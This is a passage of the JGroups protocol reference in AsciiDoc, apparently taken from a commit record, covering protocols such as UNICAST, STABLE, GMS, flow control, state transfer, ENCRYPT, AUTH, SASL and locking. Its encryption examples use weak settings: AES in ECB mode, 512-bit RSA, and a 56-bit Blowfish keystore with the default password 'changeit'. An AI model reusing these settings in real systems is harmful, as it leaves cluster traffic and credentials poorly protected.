However, concurrent\n delivery of messages from the same sender is prevented by UNICAST by acquiring a lock on the sender's\n retransmission table, so unless concurrent delivery is desired, UNICAST should not be removed from\n the stack even if TCP is used.\n \n\n${UNICAST}\n\n[[UNICAST2]]\n\n\n==== UNICAST2\n\nUNICAST2 provides lossless, ordered, communication between 2 members. Contrary to UNICAST, it\n uses _negative acks_ (similar to NAKACK) rather than positive acks. This reduces the communication\n overhead required for sending an ack for every message.\n \n\nNegative acks have sender A simply send messages without retransmission, and receivers never ack\n messages, until they detect a gap: for instance, if A sends messages 1,2,4,5, then B delivers 1 and 2,\n but queues 4 and 5 because it is missing message 3 from A. B then asks A to retransmit 3. When 3 is\n received, messages 3, 4 and 5 can be delivered to the application.\n \n\nCompared to a positive ack scheme as used in UNICAST, negative acks have the advantage that they generate\n less traffic: if all messages are received in order, we never need to do retransmission.\n \n\n${UNICAST2}\n\n[[UNICAST3]]\n\n\n==== UNICAST3\n\nUNICAST3 (available in 3.3) is the successor to UNICAST2, but is based on UNICAST, as it uses a\n positive acknowledgment mechanism. However, speed wise it is similar to UNICAST2\n \n\nDetails of UNICAST3's design can be found here:\n link:$$https:\/\/github.com\/belaban\/JGroups\/blob\/master\/doc\/design\/UNICAST3.txt$$[UNICAST3]\n \n\n${UNICAST3}\n\n[[RSVP]]\n\n\n==== RSVP\n\nThe RSVP protocol is not a reliable delivery protocol per se, but augments reliable protocols such\n as NAKACK, UNICAST or UNICAST2. It should be placed somewhere _above_ these in\n the stack.\n \n\n${RSVP}\n\n[[STABLE]]\n\n\n=== Message stability\n\nTo serve potential retransmission requests, a member has to store received messages until it is known\n that every member in the cluster has received them. Message stability for a given message M means that M\n has been seen by everyone in the cluster.\n \n\nThe stability protocol periodically (or when a certain number of bytes have been received) initiates a\n consensus protocol, which multicasts a stable message containing the highest message numbers for a\n given member. This is called a digest.\n \n\nWhen everyone has received everybody else's stable messages, a digest is computed which consists of the\n minimum sequence numbers of all received digests so far. This is the stability vector, and contain only\n message sequence numbers that have been seen by everyone.\n \n\nThis stability vector is the broadcast to the group and everyone can remove messages from their\n retransmission tables whose sequence numbers are smaller than the ones received in the stability vector.\n These messages can then be garbage collected.\n \n\n\n\n==== STABLE\n\nSTABLE garbage collects messages that have been seen by all members of a cluster. Each member has to\n store all messages because it may be asked to retransmit. Only when we are sure that all members have\n seen a message can it be removed from the retransmission buffers. STABLE periodically gossips its\n highest and lowest messages seen. The lowest value is used to compute the min (all lowest seqnos\n for all members), and messages with a seqno below that min can safely be discarded.\n \n\nNote that STABLE can also be configured to run when N bytes have been received. This is recommended\n when sending messages at a high rate, because sending stable messages based on time might accumulate\n messages faster than STABLE can garbage collect them.\n \n\n${STABLE}\n\n[[GMS]]\n\n\n=== Group Membership\n\nGroup membership takes care of joining new members, handling leave\n requests by existing members, and handling SUSPECT messages for crashed\n members, as emitted by failure detection protocols. The algorithm for\n joining a new member is essentially:\n \n\n\n----\n\n- loop\n- find initial members (discovery)\n- if no responses:\n - become singleton group and break out of the loop\n- else:\n - determine the coordinator (oldest member) from the responses\n - send JOIN request to coordinator\n - wait for JOIN response\n - if JOIN response received:\n - install view and break out of the loop\n - else\n - sleep for 5 seconds and continue the loop\n \n----\n\n\n\n==== pbcast.GMS\n\n${GMS}\n\n\n\n===== Joining a new member\n\nConsider the following situation: a new member wants to join a\n group. The prodedure to do so is:\n \n\n* Multicast an (unreliable) discovery request (ping)\n* Wait for n responses or m milliseconds (whichever is first)\n* Every member responds with the address of the coordinator\n* If the initial responses are > 0: determine the coordinator and start the JOIN protocol\n* If the initial response are 0: become coordinator, assuming that no one else is out there\n\nHowever, the problem is that the initial mcast discovery request\nmight get lost, e.g. when multiple members start at the same time, the\noutgoing network buffer might overflow, and the mcast packet might get\ndropped. Nobody receives it and thus the sender will not receive any\nresponses, resulting in an initial membership of 0. This could result in\nmultiple coordinators, and multiple subgroups forming. How can we overcome\nthis problem ? There are two solutions:\n\n. Increase the timeout, or number of responses received. This will\n only help if the reason of the empty membership was a slow host. If\n the mcast packet was dropped, this solution won't help\n. Add the MERGE2 or MERGE3 protocol. This doesn't actually prevent\n multiple initial cordinators, but rectifies the problem by merging\n different subgroups back into one. Note that this might involve state\n merging which needs to be done by the application.\n \n\n\n[[FlowControl]]\n=== Flow control\n\nFlow control takes care of adjusting the rate of a message sender to the rate of the slowest receiver over time.\n If a sender continuously sends messages at a rate that is faster than the receiver(s), the receivers will\n either queue up messages, or the messages will get discarded by the receiver(s), triggering costly\n retransmissions. In addition, there is spurious traffic on the cluster, causing even more retransmissions.\n \n\nFlow control throttles the sender so the receivers are not overrun with messages.\n \n\nNote that flow control can be bypassed by setting message flag Message.NO_FC. See <<MessageFlags>>\n for details.\n \n\nThe properties for FlowControl are shown below and can be used in\n MFC and UFC:\n \n\n${FlowControl}\n\n\n\n==== FC\n\nFC uses a credit based system, where each sender has +$$max_credits$$+ credits and decrements\n them whenever a message is sent. The sender blocks when the credits fall below 0, and only resumes\n sending messages when it receives a replenishment message from the receivers.\n \n\nThe receivers maintain a table of credits for all senders and decrement the given sender's credits\n as well, when a message is received.\n \n\nWhen a sender's credits drops below a threshold, the receiver will send a replenishment message to\n the sender. The threshold is defined by +$$min_bytes$$+ or +$$min_threshold$$+.\n \n\n${FC}\n\n\nNOTE: FC has been deprecated, use MFC and UFC instead\n\n\n==== MFC and UFC\n\nIn 2.10, FC was separated into MFC (Multicast Flow Control) and Unicast Flow Control (UFC). The reason\n was that multicast flow control should not be impeded by unicast flow control, and vice versa. Also,\n performance for the separate implementations could be increased, plus they can be individually omitted.\n For example, if no unicast flow control is needed, UFC can be left out of the stack configuration.\n \n\n[[MFC]]\n\n\n===== MFC\n\nMFC has currently no properties other than those inherited by\n FlowControl (see above).\n \n\n${MFC}\n\n[[UFC]]\n\n\n===== UFC\n\nUFC has currently no properties other than those inherited by\n FlowControl (see above).\n \n\n${UFC}\n\n\n\n=== Fragmentation\n\n\n\n==== FRAG and FRAG2\n\nFRAG and FRAG2 fragment large messages into smaller ones, send the smaller ones, and at the receiver\n side, the smaller fragments will get assembled into larger messages again, and delivered to the\n application. FRAG and FRAG2 work for both unicast and multicast messages.\n \n\nThe difference between FRAG and FRAG2 is that FRAG2 does 1 less copy than FRAG, so it is the recommended\n fragmentation protocol. FRAG serializes a message to know the exact size required (including headers),\n whereas FRAG2 only fragments the payload (excluding the headers), so it is faster.\n \n\nThe properties of FRAG2 are:\n \n\n${FRAG2}\n\nContrary to FRAG, FRAG2 does not need to serialize a message in order to break it into smaller\n fragments: it looks only at the message's buffer, which is a byte array anyway. We assume that the\n size addition for headers and src and dest addresses is minimal when the transport finally has to\n serialize the message, so we add a constant (by default 200 bytes). Because of the efficiency gained by\n not having to serialize the message just to determine its size, FRAG2 is generally recommended over FRAG.\n \n\n\n\n=== Ordering\n\n[[SEQUENCER]]\n\n\n==== SEQUENCER\n\nSEQUENCER provider total order for multicast (=group) messages by forwarding messages to the current\n coordinator, which then sends the messages to the cluster on behalf of the original sender. Because it\n is always the same sender (whose messages are delivered in FIFO order), a global (or total) order\n is established.\n \n\nSending members add every forwarded message M to a buffer and remove M when they receive it. Should\n the current coordinator crash, all buffered messages are forwarded to the new coordinator.\n \n\n${SEQUENCER}\n\n[[TOA]]\n\n\n==== Total Order Anycast (TOA)\n\nA total order anycast is a totally ordered message sent to a subset of the cluster members. TOA\n intercepts messages with an AnycastMessage (carrying a list of addresses) and handles sending of the\n message in total order. Say the cluster is {A,B,C,D,E} and the Anycast is to {B,C}.\n \n\nSkeen's algorithm is used to send the message: B and C each maintain a logical clock (a counter).\n When a message is to be sent, TOA contacts B and C and asks them for their counters. B and C return\n their counters (incrementing them for the next request).\n \n\nThe originator of the message then sets the message's ID to be the max of all returned counters and\n sends the message. Receivers then deliver the messages in order of their IDs.\n \n\nThe main use of TOA is currently in Infinispan's transactional caches with partial replication: it\n is used to apply transactional modifications in total order, so that no two-phase commit protocol\n has to be run and no locks have to be acquired.\n \n\nAs shown in link:$$http:\/\/www.cloudtm.eu\/home\/Publications$$[ \"Exploiting Total Order Multicast in Weakly Consistent Transactional Caches\"], when we have\n many conflicts by different transactions modifying the same keys, TOM fares better than 2PC.\n \n\nNote that TOA is experimental (as of 3.1).\n \n\n${tom.TOA}\n\n[[StateTransferProtocolDetails]]\n\n\n=== State Transfer\n\n[[pbcast.STATE_TRANSFER]]\n\n\n==== pbcast.STATE_TRANSFER\n\nSTATE_TRANSFER is the existing transfer protocol, which transfers byte[] buffers around. However, at the\n state provider's side, JGroups creates an output stream over the byte[] buffer, and passes the\n ouput stream to the getState(OutputStream) callback, and at the state\n requester's side, an input stream is created and passed to the\n setState(InputStream) callback.\n \n\nThis allows us to continue using STATE_TRANSFER, until the new state transfer protocols are going to\n replace it (perhaps in 4.0).\n \n\nIn order to transfer application state to a joining member of a cluster, STATE_TRANSFER has to load\n entire state into memory and send it to a joining member. The major limitation of this approach is that\n for state transfers that are very large this would likely result in memory exhaustion.\n \n\nFor large state transfer use either the STATE or STATE_SOCK protocol. However, if the state is small,\n STATE_TRANSFER is okay.\n \n\n${STATE_TRANSFER}\n\n[[StreamingStateTransfer]]\n\n\n==== StreamingStateTransfer\n\nStreamingStateTransfer is the superclass of STATE and STATE_SOCK (see below).\n Its properties are:\n \n\n${StreamingStateTransfer}\n\n[[pbcast.STATE]]\n\n\n==== pbcast.STATE\n\n\n\n===== Overview\n\nSTATE was renamed from (2.x) STREAMING_STATE_TRANSFER, and refactored to extend a common superclass\n StreamingStateTransfer. The other state transfer protocol extending\n StreamingStateTransfer is STATE_SOCK (see <<STATE_SOCK>>).\n \n\nSTATE uses a _streaming approach_ to state transfer; the\n state provider writes its state to the output stream passed to it in the\n getState(OutputStream) callback, which chunks the stream up into chunks\n that are sent to the state requester in separate messages.\n \n\nThe state requester receives those chunks and feeds them into the input stream from which the\n state is read by the setState(InputStream) callback.\n \n\nThe advantage compared to STATE_TRANSFER is that state provider and requester only need small\n (transfer) buffers to keep a part of the state in memory, whereas STATE_TRANSFER needs to copy\n the _entire_ state into memory.\n \n\nIf we for example have a list of 1 million elements, then STATE_TRANSFER would have to create a\n byte[] buffer out of it, and return the byte[] buffer, whereas a streaming approach could iterate\n through the list and write each list element to the output stream. Whenever the buffer capacity is\n reached, we'd then send a message and the buffer would be reused to receive more data.\n \n\n\n\n===== Configuration\n\nSTATE has currently no properties other than those inherited by\n StreamingStateTransfer (see above).\n \n\n[[pbcast.STATE_SOCK]]\n\n\n==== STATE_SOCK\n\nSTATE_SOCK is also a streaming state transfer protocol, but compared to STATE, it doesn't send the chunks\n as messages, but uses a TCP socket connection between state provider and requester to transfer the state.\n \n\nThe state provider creates a server socket at a configurable bind address and port, and the address\n and port are sent back to a state requester in the state response. The state requester then establishes\n a socket connection to the server socket and passes the socket's input stream to the\n setState(InputStream) callback.\n \n\n\n\n===== Configuration\n\nThe configuration options of STATE_SOCK are listed below:\n \n\n${STATE_SOCK}\n\n[[BARRIER]]\n\n\n==== BARRIER\n\nBARRIER is used by some of the state transfer protocols, as it lets existing threads complete and blocks\n new threads to get both the digest and state in one go.\n \n\nIn 3.1, a new mechanism for state transfer will be implemented, eliminating the need for BARRIER. Until\n then, BARRIER should be used when one of the state transfer protocols is used. BARRIER is\n part of every default stack which contains a state transfer protocol.\n \n\n${BARRIER}\n\n\n\n=== pbcast.FLUSH\n\nFlushing forces group members to send all their pending messages\n prior to a certain event. The process of flushing acquiesces the\n cluster so that state transfer or a join can be done. It is also\n called the stop-the-world model as nobody will be able to send\n messages while a flush is in process. Flush is used in:\n \n\n\nState transfer:: When a member requests state transfer, it tells everyone to\n stop sending messages and waits for everyone's ack. Then it have received everyone's asks,\n the application asks the coordinator for its state and ships it back to the\n requester. After the requester has received and set the state\n successfully, the requester tells everyone to resume sending messages.\nView changes (e.g.a join):: Before installing a new view\n V2, flushing ensures that all messages _sent_ in the\n current view V1 are indeed _delivered_ in V1, rather than in V2\n (in all non-faulty members). This is essentially Virtual Synchrony.\n \n\n\n \n \n\nFLUSH is designed as another protocol positioned just below the\n channel, on top of the stack (e.g. above STATE_TRANSFER). The STATE_TRANSFER and GMS\n protocols request a flush by sending an event up the stack, where\n it is handled by the FLUSH protcol. Another event is sent back by\n the FLUSH protocol to let the caller know that the flush has completed.\n When done (e.g. view was installed or state transferred), the protocol\n sends a message, which will allow everyone in the cluster to resume sending.\n \n\nA channel is notified that the FLUSH phase has been started by\n the Receiver.block() callback. \n \n\nRead more about flushing in <<Flushing>>.\n \n\n${FLUSH}\n\n[[Misc]]\n\n\n=== Misc\n\n[[STATS]]\n\n\n==== Statistics\n\nSTATS exposes various statistics, e.g. number of received multicast and unicast messages, number of\n bytes sent etc. It should be placed directly over the transport\n \n\n${STATS}\n\n[[Security]]\n\n\n==== Security\n\nJGroups provides protocols to encrypt cluster traffic (ENCRYPT), and to make sure that only\n authorized members can join a cluster (AUTH and SASL).\n \n\n[[ENCRYPT]]\n\n\n===== ENCRYPT\n\nA detailed description of ENCRYPT is found in the JGroups source (__JGroups\/doc\/ENCRYPT.html__).\nEncryption by default only encrypts the message body, but doesn't encrypt message headers.\nTo encrypt the entire message (including all headers, plus destination and source addresses),\nthe property ++$$encrypt_entire_message$$++ has to be set to true.\nAlso, ENCRYPT has to be below any protocols whose headers we want to encrypt, e.g.\n\n\n[source,xml]\n----\n<config ... >\n <UDP \/>\n <PING \/>\n <MERGE2 \/>\n <FD \/>\n <VERIFY_SUSPECT \/>\n <pbcast.NAKACK \/>\n <UNICAST \/>\n <pbcast.STABLE \/>\n <FRAG2 \/>\n <pbcast.GMS \/>\n <ENCRYPT encrypt_entire_message=\"false\"\n sym_init=\"128\" sym_algorithm=\"AES\/ECB\/PKCS5Padding\"\n asym_init=\"512\" asym_algorithm=\"RSA\"\/>\n<\/config>\n----\n\nNote that ENCRYPT sits below NAKACK and UNICAST, so the sequence numbers for these 2 protocols will\n be encrypted. Had ENCRYPT been placed below UNICAST but above NAKACK, then only UNICAST's headers\n (including sequence numbers) would have been encrypted, but not NAKACKs.\n \n\nNote that it doesn't make too much sense to place ENCRYPT even lower in the stack, because then\n almost all traffic (even merge or discovery traffic) will be encrypted, which may be somewhat of\n a performance drag.\n \n\nWhen we encrypt an entire message, we have to marshal the message into a byte buffer first and\n then encrypt it. This entails marshalling and copying of the byte buffer, which is not so good\n performance wise...\n \n\n\n\n.Using a key store\nENCRYPT uses store type JCEKS (for details between JKS and JCEKS see here), however\n +keytool+ uses JKS, therefore a keystore generated with keytool will not be accessible.\n \n\nTo generate a keystore compatible with JCEKS, use the following command line options to keytool:\n \n\n\n----\n\nkeytool -genseckey -alias myKey -keypass changeit -storepass changeit -keyalg Blowfish -keysize 56 -keystore defaultStore.keystore -storetype JCEKS\n \n----\n\nENCRYPT could then be configured as follows:\n \n\n\n[source,xml]\n----\n\n<ENCRYPT key_store_name=\"defaultStore.keystore\"\n store_password=\"changeit\"\n alias=\"myKey\"\/>\n \n----\n\nNote that defaultStore.keystore will have to be found in the claspath.\n \n\n\nNOTE: If asymmetric encryption is used (no shared key via keystore), ENCRYPT has to be placed somewhere _above_ GMS,\n or else the JOIN process would not function (as the JOIN response would get dropped).\n\n${ENCRYPT}\n\n[[AUTH]]\n\n\n===== AUTH\n\nAUTH is used to provide a layer of authentication to JGroups. This allows you to define pluggable\n security that defines if a node should be allowed to join a cluster. AUTH sits below the GMS\n protocol and listens for JOIN REQUEST messages. When a JOIN REQUEST is received it tries to find\n an AuthHeader object, inside of which should be an implementation of the AuthToken object.\n \n\nAuthToken is an abstract class, implementations of which are responsible for providing the\n actual authentication mechanism. Some basic implementations of AuthToken are provide in the\n org.jgroups.auth package (SimpleToken, MD5Token and X509Token). Effectivly all these implementations\n do is encrypt a string (found in the jgroups config) and pass that on the JOIN REQUEST.\n \n\nWhen authentication is successful, the message is simply passed up the stack to the GMS protocol.\n When it fails, the AUTH protocol creates a JOIN RESPONSE message with a failure string and passes\n it back down the stack. This failure string informs the client of the reason for failure.\n Clients will then fail to join the group and will throw a SecurityException.\n If this error string is null then authentication is considered to have passed.\n \n\nFor more information refer to the wiki at http:\/\/community.jboss.org\/wiki\/JGroupsAUTH[AUTH].\n \n\n${AUTH}\n\n[[SASL]]\n\n\n===== SASL\n\nSASL is an alternative to the AUTH protocol which provides a layer of authentication to JGroups by allowing the\n use of one of the SASL mechanisms made available by the JDK. SASL sits below the GMS\n protocol and listens for JOIN \/ MERGE REQUEST messages. When a JOIN \/ MERGE REQUEST is received it tries to find\n a SaslHeader object which contains the initial response required by the chosen SASL mech. This initiates a sequence\n of challenge\/response messages which, if successful, culminates in allowing the new node to join the cluster. The actual\n validation logic required by the SASL mech must be provided by the user in the form of a standard javax.security.auth.CallbackHandler\n implementation.\n \n\nWhen authentication is successful, the message is simply passed up the stack to the GMS protocol.\n When it fails, the SASL protocol creates a JOIN \/ MERGE RESPONSE message with a failure string and passes\n it back down the stack. This failure string informs the client of the reason for failure.\n Clients will then fail to join the group and will throw a SecurityException.\n If this error string is null then authentication is considered to have passed.\n \n\nSASL can be (minimally) configured as follows:\n \n\n\n[source,xml]\n----\n\n<config ... >\n <UDP \/>\n <PING \/>\n <pbcast.NAKACK \/>\n <UNICAST3 \/>\n <pbcast.STABLE \/>\n <SASL mech=\"DIGEST-MD5\" \n client_callback_handler=\"org.example.ClientCallbackHandler\" \n server_callback_handler=\"org.example.ServerCallbackHandler\"\/>\n <pbcast.GMS \/>\n \n<\/config>\n \n----\n\nThe +mech+ property specifies the SASL mech you want to use, as defined by RFC-4422. You will also need to provide two\n callback handlers, one used when the node is running as coordinator (++$$server_callback_handler$$++) and one used in all other \n cases (++$$client_callback_handler$$++). Refer to the JDK's SASL reference guide for more details: link:$$http:\/\/docs.oracle.com\/javase\/7\/docs\/technotes\/guides\/security\/sasl\/sasl-refguide.html$$[] \n \nThe JGroups package comes with a simple properties-based CallbackHandler which can be used when a more complex Kerberos\/LDAP approach is not needed. To use this set both the (++$$server_callback_handler$$++) and\n the (++$$client_callback_handler$$++) to org.jgroups.auth.sasl.SimpleAuthorizingCallbackHandler. This CallbackHandler can be configured either programmatically by passing to the constructor an\n instance of java.util.Properties containing the appropriate properties, or via standard Java system properties (i.e. set on the command-line using the -DpropertyName=propertyValue notation.\n The following properties are available:\n\n* sasl.credentials.properties - the path to a property file which contains principal\/credential mappings represented as principal=password\n* sasl.local.principal - the name of the principal that is used to identify the local node. It must exist in the sasl.credentials.properties file\n* sasl.roles.properties - (optional) the path to a property file which contains principal\/roles mappings represented as principal=role1,role2,role3\n* sasl.role - (optional) if present, authorizes joining nodes only if their principal is\n* sasl.realm - (optional) the name of the realm to use for the SASL mechanisms that require it\n\n${SASL}\n\n[[COMPRESS]]\n\n\n==== COMPRESS\n\nCOMPRESS compresses messages larger than +$$min_size$$+, and uncompresses them at the\n receiver's side. Property +$$compression_level$$+ determines how thorough the\n compression algorith should be (0: no compression, 9: highest compression).\n \n\n${COMPRESS}\n\n[[SCOPE]]\n\n\n==== SCOPE\n\nAs discussed in <<Scopes>>, the SCOPE protocol is used to deliver updates\n to different scopes concurrently. It has to be placed somewhere above UNICAST and NAKACK.\n \n\nSCOPE has a separate thread pool. The reason why the default thread pool from the transport wasn't used\n is that the default thread pool has a different purpose. For example, it can use a queue to which all\n incoming messages are added, which would defy the purpose of concurrent delivery in SCOPE. As a matter\n of fact, using a queue would most likely delay messages get sent up into SCOPE!\n \n\nAlso, the default pool's rejection policy might not be \"run\", so the SCOPE implementation would have\n to catch rejection exceptions and engage in a retry protocol, which is complex and wastes resources.\n \n\nThe configuration of the thread pool is shown below. If you expect _concurrent_\n messages to N _different_ scopes, then the max pool size would ideally be set\n to N. However, in most cases, this is not necessary as (a) the messages might not be to different\n scopes or (b) not all N scopes might get messages at the same time. So even if the max pool size is a\n bit smaller, the cost of this is slight delays, in the sense that a message for scope Y might wait until\n the thread processing message for scope X is available.\n \n\nTo remove unused scopes, an expiry policy is provided: expiration_time is the number of milliseconds\n after which an idle scope is removed. An idle scope is a scope which hasn't seen any messages for\n expiration_time milliseconds. The expiration_interval value defines the number of milliseconds at\n which the expiry task runs. Setting both values to 0 disables expiration; it would then have to be\n done manually (see <<Scopes>> for details).\n \n\n${SCOPE}\n\n[[RELAY]]\n\n\n==== RELAY\n\nRELAY bridges traffic between seperate clusters, see <<RelayAdvanced>> for details.\n \n\n${RELAY}\n\n[[RELAY2]]\n\n\n==== RELAY2\n\nRELAY2 provides clustering between different sites (local clusters), for multicast and unicast messages.\n See <<Relay2Advanced>> for details.\n \n\n${RELAY2}\n\n[[STOMP_Protocol]]\n\n\n==== STOMP\n\nSTOMP is discussed in <<STOMP>>. The properties for it are shown below:\n \n\n${STOMP}\n\n[[DAISYCHAIN]]\n\n\n==== DAISYCHAIN\n\nThe DAISYCHAIN protocol is discussed in <<DaisyChaining>>.\n \n\n${DAISYCHAIN}\n\n[[RATE_LIMITER]]\n\n\n==== RATE_LIMITER\n\nRATE_LIMITER can be used to set a limit on the data sent per time unit. When sending data, only\n max_bytes can be sent per time_period milliseconds. E.g. if max_bytes=\"50M\" and time_period=\"1000\", then\n a sender can only send 50MBytes \/ sec max.\n \n\n${RATE_LIMITER}\n\n[[LockingProtocols]]\n==== Locking protocols\n\nThere are currently 2 locking protocols: org.jgroups.protocols.CENTRAL_LOCK and\n org.jgroups.protocols.PEER_LOCK. Both extend Locking, which has the\n following properties:\n \n\n${Locking}\n\n[[CENTRAL_LOCK]]\n\n\n===== CENTRAL_LOCK\n\nCENTRAL_LOCK has the current coordinator of a cluster grants locks, so every node has to communicate\n with the coordinator to acquire or release a lock. Lock requests by different nodes for the same lock\n are processed in the order in which they are received.\n \n\nA coordinator maintains a lock table. To prevent losing the knowledge of who holds which locks, the\n coordinator can push lock information to a number of backups defined by num_backups. If num_backups\n is 0, no replication of lock information happens. If num_backups is greater than 0, then the coordinator\n pushes information about acquired and released locks to all backup nodes. Topology changes might\n create new backup nodes, and lock information is pushed to those on becoming a new backup node.\n \n\nThe advantage of CENTRAL_LOCK is that all lock requests are granted in the same order across\n the cluster, which is not the case with PEER_LOCK.\n \n\n${CENTRAL_LOCK}\n\n[[PEER_LOCK]]\n\n\n===== PEER_LOCK\n\nPEER_LOCK acquires a lock by contacting all cluster nodes, and lock acquisition is only successful\n if all non-faulty cluster nodes (peers) grant it.\n \n\nUnless a total order configuration is used (e.g. org.jgroups.protocols.SEQUENCER based), lock\n requests for the same resource from different senders may be received in different order, so\n deadlocks can occur. Example:\n \n* Nodes A and B\n* A and B call lock(X) at the same time\n* A receives L(X,A) followed by L(X,B): locks X(A), queues L(X,B)\n* B receives L(X,B) followed by L(X,A): locks X(B), queues L(X,A)\n \n\nTo acquire a lock, we need lock grants from both A and B, but this will never happen here.\n To fix this, either add SEQUENCER to the configuration, so that all lock requests are received in\n the same global order at both A and B, or use\n java.util.concurrent.locks.Lock.tryLock(long,javaTimeUnit) with retries if a lock cannot be acquired.\n \n\n${PEER_LOCK}\n\n[[CENTRAL_EXECUTOR]]\n\n\n==== CENTRAL_EXECUTOR\n\nCENTRAL_EXECUTOR is an implementation of Executing which is needed by the ExecutionService.\n \n\n${Executing}\n\n${CENTRAL_EXECUTOR}\n\n[[COUNTER]]\n\n\n==== COUNTER\n\nCOUNTER is the implementation of cluster wide counters, used by the CounterService.\n \n\n${COUNTER}\n\n[[SUPERVISOR]]\n\n\n==== SUPERVISOR\n\nSUPERVISOR is a protocol which runs rules which periodically (or event triggered) check conditions and\n take corrective action if a condition is not met. Example: org.jgroups.protocols.rules.CheckFDMonitor is\n a rule which periodically checks if FD's monitor task is running when the cluster size is > 1. If not,\n the monitor task is started.\n \n\nThe SUPERVISOR is explained in more detail in <<Supervisor>>\n \n\n${SUPERVISOR}\n\n[[FORK]]\n\n\n==== FORK\n\nFORK allows ForkChannels to piggy-back messages on a regular channel. Needs to be placed towards the\n top of the stack. See <<ForkChannel>> for details.\n \n\n${FORK}\n\n","old_contents":"[[protlist]]\n\n== List of Protocols\n\nThis chapter describes the most frequently used protocols, and their configuration. _Ergonomics_\n(<<Ergonomics>>) strives to reduce the number of properties that have to be configured, by\ndynamically adjusting them at run time, however, this is not yet in place.\n \n\nMeanwhile, we recommend that users should copy one of the predefined configurations (shipped with JGroups), e.g.\n+udp.xml+ or +tcp.xml+, and make only minimal changes to it.\n\nThis section is work in progress; we strive to update the documentation as we make changes to the code.\n \n\n[[CommonProps]]\n=== Properties availabe in every protocol\n\nThe table below lists properties that are available in all protocols, as they're defined in the superclass\nof all protocols, org.jgroups.stack.Protocol.\n \n\n.Properties of org.jgroups.stack.Protocol\n[align=\"left\",width=\"90%\",cols=\"2,10\",options=\"header\"]\n|===============\n|Name|Description\n| stats | Whether the protocol should collect protocol-specific runtime statistics. What those\n statistics are (or whether they even exist) depends on the particular protocol.\n See the `org.jgroups.stack.Protocol` javadoc for the available API related to statistics.\n Default is true.\n \n|ergonomics | Turns on ergonomics. See <<Ergonomics>> for details.\n \n|id | Gives the protocol a different ID if needed so we can have multiple instances of it in\n the same stack\n|===============\n\n\n[[Transport]]\n=== Transport\n\n`TP` is the base class for all transports, e.g. `UDP` and `TCP`. All of the properties\ndefined here are inherited by the subclasses. The properties for `TP` are:\n \n\n${TP}\n\n`bind_addr` can be set to the address of a network interface, e.g. +192.168.1.5+.\nIt can also be set for the entire stack using system property +$$-Djgroups.bind_addr$$+, which\nprovides a value for bind_addr unless it has already been set in the XML config.\n \n\nThe following special values are also recognized for ++$$bind_addr$$++:\n \n\nGLOBAL:: Picks a global IP address if available. If not, falls back to a SITE_LOCAL IP address.\n\nSITE_LOCAL:: Picks a site local (non routable) IP address, e.g. from the +192.168.0.0+ or\n +10.0.0.0+ address range.\n\nLINK_LOCAL:: Picks a link-local IP address, from +169.254.1.0+ through\n +169.254.254.255+.\n\nNON_LOOPBACK:: Picks _any_ non loopback address.\n \nLOOPBACK:: Pick a loopback address, e.g. +127.0.0.1+.\n\nmatch-interface:: Pick an address which matches a pattern against the interface name,\n e.g. +match-interface:eth.\\*+\n\nmatch-address:: Pick an address which matches a pattern against the host address,\n e.g. +match-address:192.168.\\*+\n\nmatch-host:: Pick an address which matches a pattern against the host name,\n e.g. +match-host:linux.\\*+\n \nAn example of setting the bind address in UDP to use a site local address is:\n \n[source,xml]\n----\n<UDP bind_addr=\"SITE_LOCAL\" \/>\n----\n\nThis will pick any address of any interface that's site-local, e.g. a +192.168.x.x+ or\n+10.x.x.x+ address.\n \n\n[[UDP]]\n==== UDP\n\nUDP uses IP multicast for sending messages to all members of a group and UDP datagrams for unicast\nmessages (sent to a single member). When started, it opens a unicast and multicast socket: the unicast\nsocket is used to send\/receive unicast messages, whereas the multicast socket sends and receives multicast\nmessages. The channel's physical address will be the address and port number of the unicast socket.\n \nA protocol stack with UDP as transport protocol is typically used with clusters whose members run\nin the same subnet. If running across subnets, an admin has to ensure that\nIP multicast is enabled across subnets. It is often the case that IP multicast is not enabled across\nsubnets. In such cases, the stack has to either use UDP without IP multicasting or other transports\nsuch as TCP.\n \n\n${UDP}\n\n\n[[TCP]]\n==== TCP\n\nSpecifying TCP in your protocol stack tells JGroups to use TCP to send messages between cluster members.\nInstead of using a multicast bus, the cluster members create a mesh of TCP connections.\n \nFor example, while UDP sends 1 IP multicast packet when sending a message to a cluster of 10 members,\nTCP needs to send the message 9 times. It sends the same message to the first member, to the second\nmember, and so on (excluding itself as the message is looped back internally).\n\nThis is slow, as the cost of sending a group message is O(n) with TCP, where it is O(1) with UDP. As the\ncost of sending a group message with TCP is a function of the cluster size, it becomes higher with\nlarger clusters.\n \n\nNOTE: We recommend to use UDP for larger clusters, whenever possible\n\n\n${BasicTCP}\n\n${TCP}\n\n\n[[TCP_NIO2]]\n==== TCP_NIO2\n\nTCP_NIO2 is similar to <<TCP>>, but uses NIO (= Non blocking IO) to send messages to and receive messages\nfrom members. Contrary to TCP, it doesn't use 1 thread per connection, but handles accepts, connects, reads and\nwrites in a *single thread*.\n\nAll of these operations are guaranteed to never block.\n\nFor example, if a read is supposed to receive 1000 bytes and only reveived 700, the read reads the 700 bytes, saves\nthem somewhere and later - when the remaining 300 bytes have been received - is notified to complete the read\nand then returns the 1000 bytes to the application.\n\nUsing a single thread is not a problem, as operations will never block. The only potentially blocking operation,\nnamely delivering messages up to the application, is done via the regular or OOB thread pools, as usual.\n\nWhile <<TCP>> and <<TCP_NIO2>> both have the N-1 problem of sending cluster wide messages (contrary to <<UDP>>),\nTCP_NIO2 is able to handle a larger number of connections than TCP, as it doesn't use the thread-per-connection model,\nand - contrary to TCP, but similar to UDP - it doesn't block when sending or receiving messages.\n\n${BasicTCP}\n\n${TCP_NIO2}\n\n\n[[TUNNEL]]\n\n\n==== TUNNEL\nTUNNEL is described in <<TUNNEL_Advanced>>.\n \n\n${TUNNEL}\n\n\n[[DiscoveryProtocols]]\n=== Initial membership discovery\n\nThe task of the discovery is to find an initial membership, which is used to determine the current\ncoordinator. Once a coordinator is found, the joiner sends a JOIN request to the coord.\n\nDiscovery is also called periodically by `MERGE2` (see <<MERGE2>>), to see if we have\ndiverging cluster membership information.\n \n\n[[Discovery]]\n==== Discovery\n\n`Discovery` is the superclass for all discovery protocols and therefore its\nproperties below can be used in any subclass.\n\nDiscovery sends a discovery request, and waits for +$$num_initial_members$$+ discovery\nresponses, or +timeout+ ms, whichever occurs first, before returning. Note that\n+$$break_on_coord_rsp=\"true\"$$+ will return as soon as we have a response from a coordinator.\n \n\n${Discovery}\n\n[[DiscoveryAndCaches]]\n===== Discovery and local caches\n\nBesides finding the current coordinator in order to send a JOIN request to it, discovery also\nfetches information about members and adds it to its local caches. This information includes\nthe logical name, UUID and IP address\/port of each member. When 